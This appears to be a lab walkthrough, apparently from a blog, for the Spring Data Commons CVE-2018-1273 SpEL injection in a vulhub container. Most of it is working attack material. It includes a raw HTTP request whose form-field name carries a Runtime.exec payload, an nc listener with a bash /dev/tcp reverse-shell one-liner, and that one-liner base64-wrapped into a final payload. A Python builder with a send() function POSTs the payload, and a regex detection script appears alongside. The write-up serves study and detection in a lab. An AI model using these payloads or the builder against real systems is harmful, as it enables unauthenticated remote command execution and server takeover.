Spring Data Commons Remote Command Execution Vulnerability CVE-2018-1273 (SpEL injection reaching java.lang.Runtime)

[poc]

1 Vulnerability description:

https://vulhub.org/#/environments/spring/CVE-2018-1273/

Spring Data Commons 2.0.5 and earlier contain a SpEL expression injection vulnerability: when a submitted form is bound to a map, the text inside the square brackets of a property path (for example username[...]) is parsed and evaluated as a SpEL expression. The expression can reach arbitrary Java classes through reflection, so anyone who can submit the form can execute OS commands on the server without authentication.

2 Environment setup

cd  /home/kali/vulhub/spring/CVE-2018-1273

2.1 Startup:
sudo docker-compose up -d

sudo docker-compose ps -a
sudo docker ps -a
2.2 Once the container is up, the application is reachable on port 8098 of the docker host

3 Affected versions:

Spring Data Commons 2.0.5 and earlier (as stated on the vulhub page). The Spring advisory lists Spring Data Commons 1.13 to 1.13.10 and 2.0 to 2.0.5; the fix shipped in 1.13.11 and 2.0.6, so check the spring-data-commons jar version in the application's classpath rather than only the Spring Boot version.

4 Vulnerability reproduction

4.1 Open the registration page

Visit http://192.168.225.166:8098/users (192.168.225.166 is the docker host in this lab).

4.2 Intercept the request in Burp Suite and modify the parameters
4.2.1 Submit the registration form, intercept the POST in Burp, send it to Repeater, and change it into the following packet (the SpEL expression goes into the name of the username field, not its value):
POST /users?page=&size=5 HTTP/1.1
Host: 192.168.225.166:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 125
Origin: http://192.168.225.166:8098
Connection: close
Referer: http://192.168.225.166:8098/users
Upgrade-Insecure-Requests: 1

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=
4.2.2 The core payload. When the request is sent, the form binder treats the text inside username[...] as a SpEL expression and evaluates it (this is expression injection, not deserialization): the expression obtains java.lang.Runtime by reflection and calls exec() with the command to run:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

4.2.3 Enter the container and confirm that /tmp/success now exists; its presence proves the command was executed on the server (note that exec() gives no feedback in the HTTP response, so a file or an outbound connection is the usual indicator):
sudo docker ps -a
sudo docker exec -it d63fc660cd63  /bin/bash
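The following Python script is an added example of a detection check for the request shape shown in 4.2; it is mine, not code from the original post, vulhub, or Spring. The heuristic and the regular expression are my own assumptions, and the sample request bodies are constructed for the example, not captured traffic. It flags form-field names whose bracketed part looks like SpEL, which every variant of this exploit needs regardless of the command it runs.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Heuristic (an assumption of this example, not taken from the page): a form-field name
# of the shape field[<expr>] whose bracket content contains SpEL variables (#this, #root),
# a type reference T(...) or reflection calls is an exploitation attempt against the
# map-based form binding that CVE-2018-1273 abuses.
SPEL_IN_FIELD_NAME = re.compile(
    r"\[[^\]]*?(#this|#root|\bT\(|getClass\(|forName\(|getRuntime\(|\.exec\()",
    re.IGNORECASE,
)


def form_field_names(body: str) -> list[str]:
    """Decoded parameter names of an application/x-www-form-urlencoded body.

    Names are decoded with unquote_plus so the brackets or '#' cannot be hidden
    behind %5B / %23 encoding, which is how a browser or scanner would send them.
    """
    names = []
    for pair in body.split("&"):
        if pair:
            names.append(unquote_plus(pair.split("=", 1)[0]))
    return names


def suspicious_field_names(body: str) -> list[str]:
    """Field names in the body that match the SpEL-in-brackets heuristic."""
    return [name for name in form_field_names(body) if SPEL_IN_FIELD_NAME.search(name)]


# Constructed sample bodies (not captured traffic): a normal registration, the page's
# raw payload, the same payload URL-encoded, and a variant using a T() type reference.
SAMPLE_BODIES = {
    "benign": "username=alice&password=s3cret&repeatedPassword=s3cret",
    "raw": 'username[#this.getClass().forName("java.lang.Runtime").getRuntime()'
           '.exec("touch /tmp/success")]=&password=&repeatedPassword=',
    "encoded": "username%5B%23this.getClass%28%29.forName%28%22java.lang.Runtime%22%29"
               ".getRuntime%28%29.exec%28%22id%22%29%5D=&password=&repeatedPassword=",
    "type_ref": "username[T(java.lang.Runtime).getRuntime().exec('id')]=&password=",
}


def scan(bodies: dict[str, str]) -> dict[str, list[str]]:
    """Return only the bodies that contain at least one suspicious field name."""
    hits = {}
    for label, body in bodies.items():
        names = suspicious_field_names(body)
        if names:
            hits[label] = names
    return hits


if __name__ == "__main__":
    for label, names in scan(SAMPLE_BODIES).items():
        print(f"{label}: {names}")
```

Treat a hit as a high-confidence exploitation attempt worth alerting on, but not as a substitute for patching: SpEL offers other ways to spell the same call (string concatenation, different method chains), so a pattern like this is a compensating control only, and the real fix is upgrading spring-data-commons to a version that no longer evaluates the bracket content with a full-power evaluation context.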

5 Exploitation

5.1 Set up a reverse shell
nc   -lvp  6666   # run on the attacker host (here 192.168.225.166): -l listen mode; -v verbose; -p listening port

bash -i &> /dev/tcp/192.168.225.166/6666 0<&1  # interactive bash with stdout/stderr sent to a TCP socket back to the listener and stdin read from it

=============Why the one-liner must be encoded==================
Runtime.exec(String) does not start a shell: it only splits the string on whitespace and runs the first token as the program. Passed as-is, "&>", "/dev/tcp/..." and "0<&1" would reach bash as literal arguments and no redirection would happen. The usual workaround is to base64-encode the one-liner and let bash itself rebuild the pipeline; the {echo,...} / {base64,-d} / {bash,-i} brace expansions avoid any whitespace outside "bash -c", so Java sees exactly three tokens:
bash -c {echo,base64-encoded one-liner}|{base64,-d}|{bash,-i}

==============Final combination=================
# encoded with https://ares-x.com/tools/runtime-exec/
bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}

5.2 Final payload (the encoded reverse-shell command placed into the SpEL expression from 4.2)
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPCYx}|{base64,-d}|{bash,-i}")]=&password=&repeatedPassword=
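The Python script below is an added example, not code from the original post or from vulhub. It builds the same request body as in 4.2 and the encoded reverse-shell command from 5.1/5.2, and it emulates the whitespace-only tokenisation that java.lang.Runtime.exec(String) applies, which is why the one-liner has to be base64-wrapped. TARGET, ATTACKER_IP and ATTACKER_PORT are the lab addresses from this page; the send() helper is my addition and only performs a network request when you call it explicitly against a lab you own.

```python
from __future__ import annotations

import base64
import urllib.error
import urllib.request

# Lab values taken from the page; change them for your own environment.
TARGET = "http://192.168.225.166:8098/users?page=&size=5"   # vulhub instance
ATTACKER_IP = "192.168.225.166"                               # host running nc -lvp
ATTACKER_PORT = 6666


def runtime_exec_argv(command: str) -> list[str]:
    """Emulate how java.lang.Runtime.exec(String) turns a string into argv.

    Java feeds the string to a StringTokenizer that splits on whitespace only
    (space, tab, newline, CR, form feed); no shell is involved, so '|', '&>' and
    '0<&1' become plain arguments of the first token instead of pipes and
    redirections. str.split() without an argument is the closest Python equivalent.
    """
    return command.split()


def reverse_shell_command(ip: str, port: int) -> str:
    """The bash one-liner from 5.1: stdout+stderr to a TCP socket, stdin from it."""
    return f"bash -i &> /dev/tcp/{ip}/{port} 0<&1"


def wrap_for_runtime_exec(shell_command: str) -> str:
    """Make a shell one-liner survive Runtime.exec tokenisation (the 5.1 trick).

    {echo,<b64>} is bash brace expansion: bash turns it into 'echo <b64>', so the
    whole pipeline contains no whitespace and stays one argv element. Java only
    sees three tokens: bash, -c, and the pipeline.
    """
    b64 = base64.b64encode(shell_command.encode()).decode()
    return f"bash -c {{echo,{b64}}}|{{base64,-d}}|{{bash,-i}}"


def spel_runtime_exec(os_command: str) -> str:
    """The SpEL expression used on the page: reach java.lang.Runtime by reflection
    and call exec(). A double quote would end the SpEL string literal, so refuse it."""
    if '"' in os_command:
        raise ValueError("os_command must not contain double quotes")
    return ('#this.getClass().forName("java.lang.Runtime")'
            f'.getRuntime().exec("{os_command}")')


def build_body(os_command: str) -> str:
    """Form body for POST /users. The expression goes into the *name* of the
    username field, because the vulnerable binder evaluates what is inside [...]."""
    return f"username[{spel_runtime_exec(os_command)}]=&password=&repeatedPassword="


def send(body: str, target: str = TARGET) -> int:
    """POST the body verbatim, as the Burp request on the page does, and return
    the HTTP status. This performs a real network request: lab use only."""
    req = urllib.request.Request(
        target,
        data=body.encode(),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code


if __name__ == "__main__":
    raw = reverse_shell_command(ATTACKER_IP, ATTACKER_PORT)
    print("argv Runtime.exec would build from the raw one-liner:")
    print("  ", runtime_exec_argv(raw))          # '&>' and '0<&1' are literal arguments
    wrapped = wrap_for_runtime_exec(raw)
    print("argv for the wrapped form:")
    print("  ", runtime_exec_argv(wrapped))      # ['bash', '-c', '{echo,...}|...']
    print("request body:")
    print(build_body(wrapped))
    # send(build_body("touch /tmp/success"))    # then check /tmp/success in the container
```

The exec() call returns nothing useful to the HTTP response, so after send() the only evidence is on the server side: the created file from 4.2.3, or the connection arriving at the nc listener from 5.1.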

5.3 The listener receives the reverse shell; it runs as root inside the container, since that is the user the vulnerable application runs as in this lab

Source: blog.csdn.net/weixin_42786460/article/details/132919796